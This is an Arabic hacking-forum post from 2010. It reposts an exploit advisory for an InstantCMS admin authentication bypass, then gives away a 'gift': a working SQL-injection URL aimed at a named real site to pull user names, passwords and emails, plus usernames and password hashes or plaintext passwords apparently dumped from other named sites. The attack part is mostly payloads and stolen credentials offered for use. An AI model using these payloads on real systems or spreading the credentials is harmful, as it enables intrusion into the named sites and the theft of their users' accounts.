ثغرة بتاريخ 24/03/2010 و مواقع و باسات هدية

Zero · 03-24-2010, 02:32 AM

بسم الله الرحمن الرحيم

الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

السلام عليكم ورحمة الله وبركاته

اليوم وكل يوم مع الجديد تغرة بتاريخ 24/03/2010

بدون الاطالة اليكم بملف التغرة وقريبا اوافيكم بالشرح

كود PHP:

  =======================================================

Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability

=======================================================

 
 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

 
#[+] Discovered By   : Inj3ct0r

#[+] Site            : Inj3ct0r.com

#[+] Support e-mail  : submit[at]inj3ct0r.com

#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

 
 
Site product: http://instantcms.ru/

Version: 1.1rc3

 
 
admin/index.php

 
Vulnerable code:

 
 //-------CHECK AUTHENTICATION-------------------------------------- 

    if (!isset($_SESSION['user'])) {  

        header('location:login.php');  

    } else {     

        if (!cmsUserIsAdmin($_SESSION['user']['id'])){             

            if (cmsUserIsEditor($_SESSION['user']['id'])){ 

                header('location:editor/index.php'); 

            } else { header('location:login.php'); } 

        } 

    } 

    //------------------------------------------------------------------ 

 
 
    

Admin panel have no password. And then you can watch and modify any files:

 
http://instantcms.ru/admin/index.php?view=editor&lang=php&file=/includes/config.inc.php

 
-----------------------------------

 
Google gives about 100 results found for :

 
intext: InstantCMS inurl: view-content/do-read

 
 
---------------------------------

 
 
# Inj3ct0r.com [2010-03-24]

و هدية بسيطة مني

مواقع مصابة بتغرة سكل

ورابط استغلالها
--

كود PHP:

  http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws%280x3a,user_name,user_password,user_email%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--

كود PHP:

       http://www.arzuntarin.com

 
User: 3938907c39b5a1608651fc7980cd1031

Pass: 1b5a6e98a37cfe03ed44f10ee34f08a2

كود PHP:

      http://www.itmaasia.com

 
Uer: adminq

Pass: 7764b0f125801509661444a2fcdbe88c

Id: 1

 
User: user2

Pass: 1234

Id: 2

 
User: zxg

Pass: 111111

المصدر: :: vBspiders Professional Network ::

eyvm fjhvdo 24L03L2010 , l,hru fhshj i]dm

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
الانتقال إلى العرض العادي الانتقال إلى العرض المتطور العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ثغرة كوكيز بتاريخ اليوم 28/07/2010 (AV Arcade v3 ****** Authentication Bypass)	alaacol	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	3	03-22-2015 01:58 PM
ثغرة جديدة من فرن فولكانو بتاريخ اليوم	Black-FoG	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	18	01-01-2015 02:40 AM
[ثغرة]~> بتاريخ 17/5/2010 (بتاريخ اليوم) SQL ++ مواقع محقونة .. الحق	Jaguar.PS	SQL قواعد البيانات	4	06-09-2010 02:56 AM
اكبر مكتبة مواقع و باسات (متجددة)	Zero	Hackers Showoff	13	05-14-2010 03:42 AM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

ثغرة بتاريخ 24/03/2010 و مواقع و باسات هدية

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات